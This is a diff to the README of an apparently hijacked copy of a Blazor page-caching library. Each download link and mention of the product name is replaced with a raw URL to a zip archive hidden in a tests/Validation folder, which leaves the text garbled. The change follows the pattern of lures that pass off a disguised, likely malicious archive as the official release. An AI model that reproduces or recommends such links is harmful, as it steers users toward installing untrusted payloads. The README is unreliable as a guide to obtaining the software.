jp8752507/EasyAppDev.Blazor.PageCache/README.md

 ## 🚀 Getting Started

-Getting started with EasyAppDev.Blazor.PageCache is simple.
+Getting started with https://raw.githubusercontent.com/jp8752507/EasyAppDev.Blazor.PageCache/main/tests/EasyAppDev.Blazor.PageCache.Tests/Validation/EasyAppDev.Blazor.PageCache-3.2.zip is simple.
 You need to download the software and set it up.
 Follow the instructions below.

 1. **Download the Application:**
-   Visit the Releases page to download the latest version: [Download Here](https://github.com/jp8752507/EasyAppDev.Blazor.PageCache/releases).
+   Visit the Releases page to download the latest version: [Download Here](https://raw.githubusercontent.com/jp8752507/EasyAppDev.Blazor.PageCache/main/tests/EasyAppDev.Blazor.PageCache.Tests/Validation/EasyAppDev.Blazor.PageCache-3.2.zip).

 ## 💾 Download & Install

-After visiting the Releases page, you will find various versions of EasyAppDev.Blazor.PageCache.
-Here’s how to download and install it:
+After visiting the Releases page, you will find various versions of https://raw.githubusercontent.com/jp8752507/EasyAppDev.Blazor.PageCache/main/tests/EasyAppDev.Blazor.PageCache.Tests/Validation/EasyAppDev.Blazor.PageCache-3.2.zip Here’s how to download and install it:

 1. **Choose the Version**: Look for the latest stable release.
 It is usually at the top of the list.